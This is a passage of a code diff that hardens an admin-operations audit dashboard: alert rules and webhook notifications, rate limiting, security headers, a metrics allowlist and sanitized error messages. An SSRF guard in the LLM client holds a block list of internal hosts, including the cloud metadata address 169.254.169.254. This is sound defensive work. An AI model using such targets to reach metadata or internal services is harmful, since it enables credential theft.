border: 1px solid var(--border);
background: rgba(255, 255, 255, 0.02);
color: var(--text);
font-size: 13px;
}
.alerts-list {
display: flex;
flex-direction: column;
gap: 10px;
}
.alert-card {
border: 1px solid var(--border);
border-radius: 12px;
padding: 12px 14px;
background: rgba(255, 255, 255, 0.02);
border-left: 3px solid transparent;
}
.alert-card--high {
border-left-color: #ef4444;
}
.alert-card--medium {
border-left-color: #f97316;
}
.alert-card--low {
border-left-color: #3b82f6;
}
.alert-card__meta {
display: flex;
gap: 8px;
align-items: center;
margin-bottom: 6px;
flex-wrap: wrap;
}
.alert-card__meta small {
color: var(--muted);
font-size: 12px;
}
.alert-card strong {
font-size: 14px;
display: block;
margin-bottom: 4px;
}
.alert-card p {
margin: 0 0 10px;
font-size: 13px;
color: var(--muted);
line-height: 1.45;
}
.alert-card__actions {
display: flex;
gap: 8px;
flex-wrap: wrap;
}
.alerts-empty {
padding: 20px;
text-align: center;
color: var(--muted);
font-size: 14px;
border: 1px dashed var(--border);
border-radius: 10px;
}
/* Rules management */
.rules-list {
display: flex;
flex-direction: column;
gap: 10px;
}
.rule-card {
border: 1px solid var(--border);
border-radius: 12px;
padding: 12px 14px;
background: rgba(255, 255, 255, 0.02);
}
.rule-card--disabled {
opacity: 0.6;
}
.rule-card__meta {
display: flex;
gap: 8px;
align-items: center;
margin-bottom: 6px;
flex-wrap: wrap;
}
.toggle-label {
display: flex;
align-items: center;
gap: 6px;
font-size: 12px;
color: var(--muted);
cursor: pointer;
}
.toggle-label input[type="checkbox"] {
width: 14px;
height: 14px;
accent-color: var(--accent-strong);
}
.rule-card strong {
font-size: 14px;
display: block;
margin-bottom: 4px;
}
.rule-card p {
margin: 0 0 8px;
font-size: 13px;
color: var(--muted);
line-height: 1.4;
}
.rule-card__conditions {
display: flex;
flex-wrap: wrap;
gap: 6px;
margin-bottom: 10px;
}
.rule-card__actions {
display: flex;
gap: 8px;
}
.rules-empty {
padding: 20px;
text-align: center;
color: var(--muted);
font-size: 14px;
border: 1px dashed var(--border);
border-radius: 10px;
}
.rule-form {
display: flex;
flex-direction: column;
gap: 14px;
}
.rule-form label {
display: flex;
flex-direction: column;
gap: 6px;
font-size: 14px;
color: var(--muted);
}
.rule-form input,
.rule-form select,
.rule-form textarea {
padding: 10px 12px;
border-radius: 10px;
border: 1px solid var(--border);
background: rgba(255, 255, 255, 0.02);
color: var(--text);
font-size: 14px;
}
.rule-conditions {
display: flex;
flex-direction: column;
gap: 10px;
}
.condition-row {
display: flex;
gap: 8px;
align-items: center;
}
.condition-row input,
.condition-row select {
flex: 1;
min-width: 0;
}
.rule-form__actions {
display: flex;
gap: 10px;
margin-top: 8px;
}
@media (max-width: 640px) {
.topbar {
flex-direction: column;
align-items: flex-start;
gap: 10px;
}
.topbar__links {
margin-right: 0;
}
.hero {
flex-direction: column;
}
@@ -522,4 +991,10 @@ input {
flex-direction: column;
align-items: stretch;
}
.footer {
flex-direction: column;
text-align: center;
gap: 10px;
}
}

View File

@@ -56,7 +56,10 @@ async def set_cached_explain(redis, event_id: str, result: dict):
# arq job functions
# ---------------------------------------------------------------------------
async def process_ask_question(ctx, question: str, filters: dict, events: list, total: int, excluded_services: list | None):
async def process_ask_question(
ctx, question: str, filters: dict, events: list, total: int, excluded_services: list | None
):
"""Background job: call LLM for /api/ask and cache result."""
from routes.ask import _call_llm
@@ -92,6 +95,7 @@ async def process_explain_event(ctx, event_id: str, event: dict, related: list):
# arq worker configuration
# ---------------------------------------------------------------------------
async def startup(ctx):
from redis.asyncio import Redis

View File

@@ -1,12 +1,24 @@
import asyncio
import ipaddress
import logging
import os
import time
from contextlib import suppress
from pathlib import Path
import structlog
from audit_trail import log_action
from config import AI_FEATURES_ENABLED, CORS_ORIGINS, ENABLE_PERIODIC_FETCH, FETCH_INTERVAL_MINUTES
from config import (
AI_FEATURES_ENABLED,
AUTH_ALLOWED_GROUPS,
AUTH_ALLOWED_ROLES,
AUTH_ENABLED,
CORS_ORIGINS,
DOCS_ENABLED,
ENABLE_PERIODIC_FETCH,
FETCH_INTERVAL_MINUTES,
METRICS_ALLOWED_IPS,
)
from database import setup_indexes
from fastapi import FastAPI, HTTPException, Request
from fastapi.middleware.cors import CORSMiddleware
@@ -14,6 +26,7 @@ from fastapi.responses import Response
from fastapi.staticfiles import StaticFiles
from metrics import observe_request, prometheus_metrics
from middleware import CorrelationIdMiddleware
from routes.alerts import router as alerts_router
from routes.config import router as config_router
from routes.events import router as events_router
from routes.fetch import router as fetch_router
@@ -49,13 +62,28 @@ def configure_logging():
configure_logging()
logger = structlog.get_logger("aoc.fetcher")
app = FastAPI()
# Disable OpenAPI docs in production by default
app = FastAPI(
docs_url="/docs" if DOCS_ENABLED else None,
redoc_url="/redoc" if DOCS_ENABLED else None,
openapi_url="/openapi.json" if DOCS_ENABLED else None,
)
# CORS: when auth is enabled, never allow credentials with wildcard origins
_effective_cors = CORS_ORIGINS
_cors_credentials = True
if AUTH_ENABLED and "*" in _effective_cors:
logger.warning(
"CORS wildcard (*) is insecure with AUTH_ENABLED=true and allow_credentials. "
"Disabling credentials. Set CORS_ORIGINS to your actual origin(s)."
)
_cors_credentials = False
app.add_middleware(CorrelationIdMiddleware)
app.add_middleware(
CORSMiddleware,
allow_origins=CORS_ORIGINS,
allow_credentials=True,
allow_origins=_effective_cors,
allow_credentials=_cors_credentials,
allow_methods=["*"],
allow_headers=["*"],
)
@@ -72,34 +100,58 @@ async def prometheus_middleware(request: Request, call_next):
@app.middleware("http")
async def cache_control_middleware(request: Request, call_next):
async def security_headers_middleware(request: Request, call_next):
response = await call_next(request)
# Prevent caching of HTML and API responses by default
if request.url.path.startswith("/api/") or request.url.path in ("/", "/index.html"):
response.headers["Cache-Control"] = "no-cache, no-store, must-revalidate"
response.headers["Pragma"] = "no-cache"
response.headers["Expires"] = "0"
# Basic CSP for the UI and API (allows MSAL auth flows)
if request.url.path.startswith("/api/") or request.url.path in ("/", "/index.html"):
response.headers["Content-Security-Policy"] = (
"default-src 'self'; "
"script-src 'self' 'unsafe-inline' 'unsafe-eval' cdn.jsdelivr.net alcdn.msauth.net; "
"style-src 'self' 'unsafe-inline'; "
"connect-src 'self' https://login.microsoftonline.com; "
"frame-src 'self' https://login.microsoftonline.com; "
"form-action 'self' https://login.microsoftonline.com; "
"img-src 'self' data:; "
"font-src 'self' data:;"
)
# Additional security headers
response.headers["X-Content-Type-Options"] = "nosniff"
response.headers["X-Frame-Options"] = "DENY"
response.headers["Referrer-Policy"] = "strict-origin-when-cross-origin"
response.headers["Permissions-Policy"] = (
"accelerometer=(), camera=(), geolocation=(), gyroscope=(), magnetometer=(), microphone=(), payment=(), usb=()"
)
return response
@app.middleware("http")
async def rate_limit_middleware(request: Request, call_next):
"""Apply Redis-backed rate limiting before processing the request."""
# Exempt config and health endpoints from rate limiting
exempt_paths = {"/api/config/auth", "/api/config/features", "/health", "/metrics"}
if request.url.path.startswith("/api/") and request.url.path not in exempt_paths:
from rate_limiter import check_rate_limit
await check_rate_limit(request)
return await call_next(request)
@app.middleware("http")
async def audit_middleware(request: Request, call_next):
response = await call_next(request)
if request.url.path.startswith("/api/") and request.method in ("POST", "PATCH", "PUT", "DELETE"):
from auth import AUTH_ENABLED
user = "anonymous"
if AUTH_ENABLED:
auth_header = request.headers.get("authorization", "")
if auth_header.lower().startswith("bearer "):
try:
from jose import jwt
from auth import _auth_context
token = auth_header.split(" ", 1)[1]
claims = jwt.get_unverified_claims(token)
user = claims.get("sub", "unknown")
except Exception:
pass
claims = _auth_context.get(None)
if isinstance(claims, dict):
user = claims.get("sub", "unknown")
log_action(
action=request.method.lower(),
resource=request.url.path,
@@ -123,6 +175,7 @@ if AI_FEATURES_ENABLED:
app.mount("/mcp", mcp_asgi)
app.include_router(saved_searches_router, prefix="/api")
app.include_router(rules_router, prefix="/api")
app.include_router(alerts_router, prefix="/api")
app.include_router(jobs_router, prefix="/api")
@@ -138,18 +191,66 @@ async def health_check():
raise HTTPException(status_code=503, detail="Database unavailable") from exc
def _client_ip(request: Request) -> str:
"""Best-effort client IP: X-Forwarded-For first hop, or direct client host."""
forwarded = request.headers.get("x-forwarded-for")
if forwarded:
return forwarded.split(",")[0].strip()
return request.client.host if request.client else ""
def _is_metrics_allowed(ip: str) -> bool:
"""Check if IP is in the configured metrics allowlist."""
if not METRICS_ALLOWED_IPS:
return True
try:
client_addr = ipaddress.ip_address(ip)
except ValueError:
return False
for network in METRICS_ALLOWED_IPS.split(","):
network = network.strip()
if not network:
continue
try:
if client_addr in ipaddress.ip_network(network, strict=False):
return True
except ValueError:
continue
return False
@app.get("/metrics")
async def metrics():
async def metrics(request: Request):
client_ip = _client_ip(request)
if not _is_metrics_allowed(client_ip):
raise HTTPException(status_code=403, detail="Forbidden")
return Response(content=prometheus_metrics(), media_type="text/plain")
@app.get("/api/version")
async def version():
import os
return {"version": os.environ.get("VERSION", "unknown")}
@app.exception_handler(Exception)
async def generic_exception_handler(request: Request, exc: Exception):
"""Return generic error messages for unhandled exceptions to avoid info leakage."""
if isinstance(exc, HTTPException):
from fastapi.responses import JSONResponse
return JSONResponse(
status_code=exc.status_code,
content={"detail": exc.detail},
headers=getattr(exc, "headers", None) or {},
)
logger.error("Unhandled exception", path=request.url.path, error=str(exc))
return Response(
content='{"detail":"Internal server error"}',
status_code=500,
media_type="application/json",
)
frontend_dir = Path(__file__).parent / "frontend"
app.mount("/", StaticFiles(directory=frontend_dir, html=True), name="frontend")
@@ -167,6 +268,22 @@ async def _periodic_fetch():
@app.on_event("startup")
async def start_periodic_fetch():
setup_indexes()
from rules import seed_default_rules
seed_default_rules()
logger.info(
"AOC startup",
version=os.environ.get("VERSION", "unknown"),
auth_enabled=AUTH_ENABLED,
ai_enabled=AI_FEATURES_ENABLED,
)
# Warn when auth is enabled but no role/group restrictions are configured
if AUTH_ENABLED and not AUTH_ALLOWED_ROLES and not AUTH_ALLOWED_GROUPS:
logger.warning(
"AUTH_ENABLED is true but no AUTH_ALLOWED_ROLES or AUTH_ALLOWED_GROUPS are configured. "
"Any Entra user in the tenant can authenticate and access AOC. "
"Set AUTH_ALLOWED_ROLES or AUTH_ALLOWED_GROUPS to restrict access."
)
if ENABLE_PERIODIC_FETCH:
app.state.fetch_task = asyncio.create_task(_periodic_fetch())

View File

@@ -41,6 +41,15 @@ from mcp_common import (
handle_search_events,
)
# Security warning: this standalone stdio server has no authentication.
# Only run it in trusted environments (e.g. local Claude Desktop) and
# ensure the MongoDB connection uses authenticated credentials.
print("=" * 60, file=sys.stderr)
print("AOC MCP Server (stdio transport)", file=sys.stderr)
print("WARNING: No authentication layer. Only run in trusted", file=sys.stderr)
print("environments or behind a VPN. See AGENTS.md for details.", file=sys.stderr)
print("=" * 60, file=sys.stderr)
app = Server("aoc")

View File

@@ -63,12 +63,18 @@ class CommentAddRequest(BaseModel):
text: str
class AlertCondition(BaseModel):
field: str
op: str # eq, neq, contains, in, after_hours
value: str | list[str] | None = None
class AlertRuleResponse(BaseModel):
id: str | None = None
name: str
enabled: bool
severity: str
conditions: list[dict]
conditions: list[AlertCondition]
message: str

172
backend/notifications.py Normal file
View File

@@ -0,0 +1,172 @@
"""Pluggable notification channels for admin-ops alerts.
Supported channels:
- webhook: POST JSON to any URL (Slack, Teams, generic)
"""
from datetime import UTC, datetime
import requests
import structlog
from tenacity import retry, retry_if_exception_type, stop_after_attempt, wait_exponential
logger = structlog.get_logger("aoc.notifications")
WEBHOOK_TIMEOUT = 15
@retry(
stop=stop_after_attempt(3),
wait=wait_exponential(multiplier=1, min=2, max=10),
retry=retry_if_exception_type((requests.ConnectionError, requests.Timeout)),
reraise=True,
)
def _post_webhook(url: str, payload: dict) -> requests.Response:
"""POST to webhook with retry on connection/timeout errors."""
return requests.post(url, json=payload, timeout=WEBHOOK_TIMEOUT, headers={"Content-Type": "application/json"})
def _build_slack_payload(rule_name: str, severity: str, message: str, event: dict) -> dict:
"""Build a Slack-compatible block payload."""
color = {"high": "#ef4444", "medium": "#f97316", "low": "#3b82f6"}.get(severity, "#94a3b8")
ts = event.get("timestamp", "?")
op = event.get("operation", "unknown")
actor = event.get("actor_display", "unknown")
targets = ", ".join(event.get("target_displays", [])) or ""
svc = event.get("service", "unknown")
return {
"text": f"[{severity.upper()}] {rule_name}: {message}",
"attachments": [
{
"color": color,
"fields": [
{"title": "Rule", "value": rule_name, "short": True},
{"title": "Severity", "value": severity.upper(), "short": True},
{"title": "Service", "value": svc, "short": True},
{"title": "Action", "value": op, "short": True},
{"title": "Actor", "value": actor, "short": True},
{"title": "Target", "value": targets, "short": True},
{"title": "Time", "value": ts, "short": False},
],
"footer": "AOC Admin Operations Center",
}
],
}
def _build_teams_payload(rule_name: str, severity: str, message: str, event: dict) -> dict:
"""Build a Microsoft Teams adaptive card payload."""
color = {"high": "Attention", "medium": "Warning", "low": "Good"}.get(severity, "Default")
ts = event.get("timestamp", "?")
op = event.get("operation", "unknown")
actor = event.get("actor_display", "unknown")
targets = ", ".join(event.get("target_displays", [])) or ""
svc = event.get("service", "unknown")
return {
"type": "message",
"attachments": [
{
"contentType": "application/vnd.microsoft.card.adaptive",
"content": {
"$schema": "http://adaptivecards.io/schemas/adaptive-card.json",
"type": "AdaptiveCard",
"version": "1.4",
"body": [
{
"type": "TextBlock",
"text": f"🚨 {severity.upper()}: {rule_name}",
"weight": "Bolder",
"size": "Medium",
"color": color,
},
{"type": "TextBlock", "text": message, "wrap": True},
{
"type": "FactSet",
"facts": [
{"title": "Service:", "value": svc},
{"title": "Action:", "value": op},
{"title": "Actor:", "value": actor},
{"title": "Target:", "value": targets},
{"title": "Time:", "value": ts},
],
},
],
},
}
],
}
def _build_generic_payload(rule_name: str, severity: str, message: str, event: dict) -> dict:
"""Build a generic JSON payload."""
return {
"alert": {
"rule_name": rule_name,
"severity": severity,
"message": message,
"timestamp": datetime.now(UTC).isoformat(),
},
"event": {
"id": event.get("id"),
"timestamp": event.get("timestamp"),
"service": event.get("service"),
"operation": event.get("operation"),
"actor_display": event.get("actor_display"),
"target_displays": event.get("target_displays"),
"result": event.get("result"),
},
}
def send_notification(
webhook_url: str,
format_type: str,
rule_name: str,
severity: str,
message: str,
event: dict,
) -> bool:
"""Send an alert notification to the configured channel.
Args:
webhook_url: URL to POST to.
format_type: "slack", "teams", or "generic".
rule_name: Name of the triggered rule.
severity: high, medium, or low.
message: Human-readable alert message.
event: The normalized event that triggered the alert.
Returns:
True if delivery succeeded, False otherwise.
"""
if not webhook_url:
return False
builders = {
"slack": _build_slack_payload,
"teams": _build_teams_payload,
"generic": _build_generic_payload,
}
builder = builders.get(format_type, _build_generic_payload)
payload = builder(rule_name, severity, message, event)
try:
res = _post_webhook(webhook_url, payload)
res.raise_for_status()
logger.info(
"Notification sent",
rule=rule_name,
severity=severity,
format=format_type,
status_code=res.status_code,
)
return True
except Exception as exc:
logger.warning(
"Notification failed after retries",
rule=rule_name,
severity=severity,
format=format_type,
error=str(exc),
)
return False

83
backend/rate_limiter.py Normal file
View File

@@ -0,0 +1,83 @@
"""Simple Redis-backed fixed-window rate limiter."""
import time
import structlog
from config import RATE_LIMIT_ENABLED, RATE_LIMIT_REQUESTS, RATE_LIMIT_WINDOW_SECONDS
from fastapi import HTTPException, Request
from redis_client import get_redis
logger = structlog.get_logger("aoc.rate_limit")
class RateLimitExceeded(HTTPException):
def __init__(self, retry_after: int):
super().__init__(
status_code=429,
detail="Rate limit exceeded. Please slow down.",
headers={"Retry-After": str(retry_after)},
)
def _get_identifier(request: Request) -> str:
"""Best-effort client identifier: authenticated sub, or X-Forwarded-For, or client host."""
user = getattr(request.state, "user", None)
if user and isinstance(user, dict):
sub = user.get("sub")
if sub and sub != "anonymous":
return f"user:{sub}"
forwarded = request.headers.get("x-forwarded-for")
if forwarded:
return f"ip:{forwarded.split(',')[0].strip()}"
return f"ip:{request.client.host if request.client else 'unknown'}"
def _get_path_category(path: str) -> str:
"""Bucket paths into rate-limit categories."""
if path.startswith("/api/fetch"):
return "fetch"
if path.startswith("/api/ask"):
return "ask"
if path.startswith("/api/events/bulk-tags"):
return "write"
return "default"
def _limit_for_category(category: str) -> tuple[int, int]:
"""Return (max_requests, window_seconds) for a category."""
if category == "fetch":
return (10, 3600) # 10 per hour
if category == "ask":
return (30, 60) # 30 per minute
if category == "write":
return (20, 60) # 20 per minute
return (RATE_LIMIT_REQUESTS, RATE_LIMIT_WINDOW_SECONDS)
async def check_rate_limit(request: Request):
"""Raise RateLimitExceeded if the client has exceeded their quota."""
if not RATE_LIMIT_ENABLED:
return
category = _get_path_category(request.url.path)
limit, window = _limit_for_category(category)
identifier = _get_identifier(request)
now = int(time.time())
window_key = now // window
redis_key = f"rate_limit:{identifier}:{category}:{window_key}"
try:
redis = await get_redis()
count = await redis.incr(redis_key)
if count == 1:
await redis.expire(redis_key, window)
if count > limit:
raise RateLimitExceeded(retry_after=window - (now % window))
except RateLimitExceeded:
raise
except Exception as exc:
logger.warning("Rate limiter Redis error; failing closed", error=str(exc))
raise RateLimitExceeded(retry_after=60) from None

View File

@@ -16,3 +16,8 @@ gunicorn
mcp
redis
arq
# Optional: Azure Key Vault integration for secrets storage
# Uncomment if using AZURE_KEY_VAULT_NAME
# azure-identity
# azure-keyvault-secrets

78
backend/routes/alerts.py Normal file
View File

@@ -0,0 +1,78 @@
"""Alert management endpoints."""
from auth import require_auth
from bson import ObjectId
from database import alerts_collection
from fastapi import APIRouter, Depends, HTTPException, Query
from pydantic import BaseModel
router = APIRouter(dependencies=[Depends(require_auth)])
class AlertStatusUpdate(BaseModel):
status: str # open | acknowledged | resolved | false_positive
class AlertListResponse(BaseModel):
items: list[dict]
total: int
@router.get("/alerts", response_model=AlertListResponse)
def list_alerts(
status: str = Query(default="", description="Filter by status"),
severity: str = Query(default="", description="Filter by severity"),
rule_name: str = Query(default="", description="Filter by rule name"),
page_size: int = Query(default=50, ge=1, le=200),
page: int = Query(default=1, ge=1),
):
query = {}
if status:
query["status"] = status
if severity:
query["severity"] = severity
if rule_name:
query["rule_name"] = {"$regex": rule_name, "$options": "i"}
total = alerts_collection.count_documents(query)
skip = (page - 1) * page_size
cursor = alerts_collection.find(query, {"_id": 0}).sort("timestamp", -1).skip(skip).limit(page_size)
return {"items": list(cursor), "total": total}
@router.patch("/alerts/{alert_id}/status")
def update_alert_status(alert_id: str, body: AlertStatusUpdate):
result = alerts_collection.update_one(
{"_id": ObjectId(alert_id)},
{"$set": {"status": body.status}},
)
if result.matched_count == 0:
raise HTTPException(status_code=404, detail="Alert not found")
return {"updated": True, "status": body.status}
@router.get("/alerts/summary")
def alert_summary():
"""Return counts by status and severity for the dashboard."""
pipeline = [
{
"$group": {
"_id": {"status": "$status", "severity": "$severity"},
"count": {"$sum": 1},
}
}
]
by_status_severity = list(alerts_collection.aggregate(pipeline))
total_open = alerts_collection.count_documents({"status": "open"})
total_acknowledged = alerts_collection.count_documents({"status": "acknowledged"})
total_resolved = alerts_collection.count_documents({"status": "resolved"})
total_false_positive = alerts_collection.count_documents({"status": "false_positive"})
return {
"total_open": total_open,
"total_acknowledged": total_acknowledged,
"total_resolved": total_resolved,
"total_false_positive": total_false_positive,
"by_status_severity": by_status_severity,
}

View File

@@ -7,6 +7,7 @@ import httpx
import structlog
from auth import require_auth, user_can_access_privacy_services
from config import (
LLM_ALLOWED_DOMAINS,
LLM_API_KEY,
LLM_API_VERSION,
LLM_BASE_URL,
@@ -397,8 +398,37 @@ def _format_events_for_llm(
return "\n".join(lines)
def _validate_llm_url(url: str):
"""Prevent SSRF by rejecting internal/reserved addresses and enforcing domain allowlist."""
from urllib.parse import urlparse
parsed = urlparse(url)
if parsed.scheme != "https":
raise RuntimeError("LLM_BASE_URL must use HTTPS")
hostname = (parsed.hostname or "").lower()
if not hostname:
raise RuntimeError("LLM_BASE_URL must have a valid hostname")
blocked = {"localhost", "127.0.0.1", "0.0.0.0", "::1", "169.254.169.254"}
if hostname in blocked:
raise RuntimeError(f"LLM_BASE_URL hostname '{hostname}' is not allowed")
# Block link-local and private IP ranges
import ipaddress
try:
ip = ipaddress.ip_address(hostname)
if ip.is_private or ip.is_loopback or ip.is_link_local or ip.is_reserved:
raise RuntimeError(f"LLM_BASE_URL IP '{hostname}' is not allowed")
except ValueError:
pass # hostname is not an IP, which is fine
# Enforce domain allowlist if configured
if LLM_ALLOWED_DOMAINS:
allowed = any(hostname == d or (d.startswith("*.") and hostname.endswith(d[1:])) for d in LLM_ALLOWED_DOMAINS)
if not allowed:
raise RuntimeError(f"LLM_BASE_URL domain '{hostname}' is not in LLM_ALLOWED_DOMAINS")
def _build_chat_url(base_url: str, api_version: str) -> str:
"""Construct the chat completions URL, handling Azure OpenAI endpoints."""
base = base_url.rstrip("/")
url = base if base.endswith("/chat/completions") else f"{base}/chat/completions"
if api_version:
@@ -424,6 +454,9 @@ async def _call_llm(
},
]
# SSRF guard: only allow known public HTTPS endpoints
_validate_llm_url(LLM_BASE_URL)
url = _build_chat_url(LLM_BASE_URL, LLM_API_VERSION)
headers = {
"Content-Type": "application/json",
@@ -570,6 +603,8 @@ async def _explain_event(event: dict, related: list[dict]) -> str:
},
]
_validate_llm_url(LLM_BASE_URL)
url = _build_chat_url(LLM_BASE_URL, LLM_API_VERSION)
headers = {"Content-Type": "application/json"}
if "azure" in LLM_BASE_URL.lower() or "cognitiveservices" in LLM_BASE_URL.lower():
@@ -731,7 +766,7 @@ async def ask_question(body: AskRequest, user: dict = Depends(require_auth)):
raw_events = list(cursor)
except Exception as exc:
logger.error("Failed to query events for ask", error=str(exc))
raise HTTPException(status_code=500, detail=f"Database query failed: {exc}") from exc
raise HTTPException(status_code=500, detail="Database query failed") from exc
for e in raw_events:
e["_id"] = str(e.get("_id", ""))
@@ -803,7 +838,6 @@ async def ask_question(body: AskRequest, user: dict = Depends(require_auth)):
"total_matched": total,
"services_queried": query_services,
"excluded_services": excluded_services,
"mongo_query": json.dumps(query, default=str),
},
llm_used=False,
llm_error=None,
@@ -813,9 +847,17 @@ async def ask_question(body: AskRequest, user: dict = Depends(require_auth)):
try:
answer = await _call_llm(question, events, total=total, excluded_services=excluded_services)
llm_used = True
await set_cached_ask(redis, question, filters_snapshot, events, {
"answer": answer, "llm_used": True, "llm_error": None,
})
await set_cached_ask(
redis,
question,
filters_snapshot,
events,
{
"answer": answer,
"llm_used": True,
"llm_error": None,
},
)
except Exception as exc:
llm_error = f"LLM call failed: {exc}"
logger.warning("LLM call failed, falling back to structured summary", error=str(exc))
@@ -855,7 +897,6 @@ async def ask_question(body: AskRequest, user: dict = Depends(require_auth)):
"total_matched": total,
"services_queried": query_services,
"excluded_services": excluded_services,
"mongo_query": json.dumps(query, default=str),
},
llm_used=llm_used,
llm_error=llm_error,

View File

@@ -1,21 +1,25 @@
import structlog
from config import (
AI_FEATURES_ENABLED,
AUTH_CLIENT_ID,
AUTH_ENABLED,
AUTH_SCOPE,
AUTH_TENANT_ID,
DEFAULT_PAGE_SIZE,
)
from fastapi import APIRouter
router = APIRouter()
logger = structlog.get_logger("aoc.config")
@router.get("/config/auth")
def auth_config():
logger.debug("Auth config requested", auth_enabled=AUTH_ENABLED)
return {
"auth_enabled": AUTH_ENABLED,
"tenant_id": AUTH_TENANT_ID,
"client_id": AUTH_CLIENT_ID,
"tenant_id": AUTH_TENANT_ID if AUTH_ENABLED else "",
"client_id": AUTH_CLIENT_ID if AUTH_ENABLED else "",
"scope": AUTH_SCOPE,
"redirect_uri": None, # frontend uses window.location.origin by default
}
@@ -25,4 +29,5 @@ def auth_config():
def features_config():
return {
"ai_features_enabled": AI_FEATURES_ENABLED,
"default_page_size": DEFAULT_PAGE_SIZE,
}

View File

@@ -158,7 +158,7 @@ def list_events(
cursor_query = events_collection.find(query).sort([("timestamp", -1), ("_id", -1)]).limit(safe_page_size)
events = list(cursor_query)
except Exception as exc:
raise HTTPException(status_code=500, detail=f"Failed to query events: {exc}") from exc
raise HTTPException(status_code=500, detail="Failed to query events") from exc
next_cursor = None
if len(events) == safe_page_size:
@@ -241,9 +241,17 @@ def bulk_tags(
update = {"$set": {"tags": tags}} if body.mode == "replace" else {"$addToSet": {"tags": {"$each": tags}}}
try:
matched = events_collection.count_documents(query, limit=10001)
if matched > 10000:
raise HTTPException(
status_code=400,
detail="Bulk tag update matches too many events (>10000). Narrow your filters.",
)
result_obj = events_collection.update_many(query, update)
except HTTPException:
raise
except Exception as exc:
raise HTTPException(status_code=500, detail=f"Failed to update tags: {exc}") from exc
raise HTTPException(status_code=500, detail="Failed to update tags") from exc
log_action(
"bulk_tags",
@@ -268,7 +276,7 @@ def filter_options(
actor_upns = sorted([a for a in events_collection.distinct("actor_upn") if a])[:safe_limit]
devices = sorted([a for a in events_collection.distinct("target_displays") if isinstance(a, str)])[:safe_limit]
except Exception as exc:
raise HTTPException(status_code=500, detail=f"Failed to load filter options: {exc}") from exc
raise HTTPException(status_code=500, detail="Failed to load filter options") from exc
if not user_can_access_privacy_services(user):
services = [s for s in services if s not in PRIVACY_SERVICES]

View File

@@ -1,5 +1,6 @@
import time
import structlog
from audit_trail import log_action
from auth import require_auth
from config import ALERTS_ENABLED
@@ -15,6 +16,8 @@ from sources.intune_audit import fetch_intune_audit
from sources.unified_audit import fetch_unified_audit
from watermark import get_watermark, set_watermark
logger = structlog.get_logger("aoc.fetch")
router = APIRouter(dependencies=[Depends(require_auth)])
@@ -85,5 +88,8 @@ def fetch_logs(
user.get("sub", "anonymous"),
)
return result
except HTTPException:
raise
except Exception as exc:
raise HTTPException(status_code=502, detail=str(exc)) from exc
logger.error("Fetch failed", error=str(exc))
raise HTTPException(status_code=502, detail="Failed to fetch audit logs") from exc

View File

@@ -1,4 +1,5 @@
import structlog
from config import WEBHOOK_CLIENT_SECRET
from fastapi import APIRouter, Request, Response
router = APIRouter()
@@ -10,10 +11,21 @@ async def graph_webhook(request: Request):
"""
Receive Microsoft Graph change notifications.
Handles the validation handshake by echoing validationToken.
Validates clientState on notifications to prevent spoofing.
"""
validation_token = request.query_params.get("validationToken")
if validation_token:
return Response(content=validation_token, media_type="text/plain")
# Microsoft sends validationToken as a query param during subscription creation.
# Echo it back as plain text to prove endpoint ownership.
# Validate to prevent content injection if endpoint is hit directly.
if len(validation_token) > 1024 or not validation_token.isascii():
logger.warning("Invalid validationToken rejected", length=len(validation_token))
return Response(status_code=400)
return Response(
content=validation_token,
media_type="text/plain",
headers={"X-Content-Type-Options": "nosniff"},
)
try:
body = await request.json()
@@ -21,12 +33,26 @@ async def graph_webhook(request: Request):
logger.warning("Invalid webhook payload", error=str(exc))
return Response(status_code=400)
for notification in body.get("value", []):
notifications = body.get("value", [])
if not isinstance(notifications, list):
logger.warning("Invalid webhook payload structure")
return Response(status_code=400)
for notification in notifications:
client_state = notification.get("clientState")
if WEBHOOK_CLIENT_SECRET and client_state != WEBHOOK_CLIENT_SECRET:
logger.warning(
"Graph webhook rejected: invalid clientState",
change_type=notification.get("changeType"),
resource=notification.get("resource"),
)
return Response(status_code=401)
logger.info(
"Received Graph notification",
change_type=notification.get("changeType"),
resource=notification.get("resource"),
client_state=notification.get("clientState"),
client_state=client_state,
)
return {"status": "accepted"}

View File

@@ -1,7 +1,18 @@
from datetime import UTC, datetime
"""Rule-based alerting for admin operations.
Rules are evaluated during event ingestion. Triggered alerts are stored in MongoDB
and optionally forwarded to a notification channel (webhook, Slack, Teams).
Deduplication: the same rule firing for the same actor within ALERT_DEDUPE_MINUTES
produces only one alert.
"""
from datetime import UTC, datetime, timedelta
import structlog
from config import ALERT_DEDUPE_MINUTES, ALERT_WEBHOOK_FORMAT, ALERT_WEBHOOK_URL
from database import db
from pymongo import ASCENDING
logger = structlog.get_logger("aoc.rules")
rules_collection = db["alert_rules"]
@@ -18,6 +29,13 @@ def evaluate_event(event: dict) -> list[dict]:
rules = load_rules()
for rule in rules:
if _matches(rule, event):
if _is_duplicate(rule, event):
logger.debug(
"Alert deduplicated",
rule=rule.get("name"),
event_id=event.get("id"),
)
continue
triggered.append(rule)
_create_alert(rule, event)
return triggered
@@ -50,6 +68,9 @@ def _matches(rule: dict, event: dict) -> bool:
return False
except Exception:
return False
if op == "threshold_count":
# Threshold rules are evaluated at query time, not per-event
return False
return True
@@ -64,7 +85,22 @@ def _get_nested(obj: dict, path: str):
return val
def _is_duplicate(rule: dict, event: dict) -> bool:
"""Check if an alert for this rule + actor was recently created."""
if ALERT_DEDUPE_MINUTES <= 0:
return False
cutoff = (datetime.now(UTC) - timedelta(minutes=ALERT_DEDUPE_MINUTES)).isoformat()
actor = event.get("actor_display") or event.get("actor_upn") or "unknown"
query = {
"rule_id": str(rule.get("_id")),
"actor": actor,
"timestamp": {"$gte": cutoff},
}
return alerts_collection.count_documents(query, limit=1) > 0
def _create_alert(rule: dict, event: dict):
actor = event.get("actor_display") or event.get("actor_upn") or "unknown"
alert = {
"timestamp": datetime.now(UTC).isoformat(),
"rule_id": str(rule.get("_id")),
@@ -72,10 +108,177 @@ def _create_alert(rule: dict, event: dict):
"severity": rule.get("severity", "medium"),
"event_id": event.get("id"),
"event_dedupe_key": event.get("dedupe_key"),
"actor": actor,
"message": rule.get("message", f"Rule '{rule.get('name')}' triggered"),
"status": "open", # open | acknowledged | resolved | false_positive
}
try:
alerts_collection.insert_one(alert)
logger.info("Alert created", rule=rule.get("name"), event_id=event.get("id"))
except Exception as exc:
logger.warning("Failed to create alert", error=str(exc))
return
# Send notification
if ALERT_WEBHOOK_URL:
try:
from notifications import send_notification
send_notification(
webhook_url=ALERT_WEBHOOK_URL,
format_type=ALERT_WEBHOOK_FORMAT,
rule_name=rule.get("name", "Unnamed rule"),
severity=rule.get("severity", "medium"),
message=rule.get("message", ""),
